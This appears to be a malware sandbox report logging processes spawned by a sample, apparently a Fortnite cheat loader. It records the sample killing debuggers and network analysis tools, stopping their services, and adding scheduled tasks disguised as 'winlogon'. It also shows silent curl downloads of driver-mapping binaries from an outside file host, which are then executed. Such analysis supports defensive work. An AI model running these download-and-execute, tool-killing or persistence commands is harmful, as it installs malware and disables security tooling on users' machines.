                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerProSdk
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop KProcessHacker3
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop KProcessHacker2
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop KProcessHacker1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wireshark
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /rl HIGHEST /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /rl HIGHEST /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color 7Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\imxyvi.exe "C:\Windows\Speech\imxyvi.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\rtcore64.exe "C:\Windows\Speech\rtcore64.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1Jump to behavior
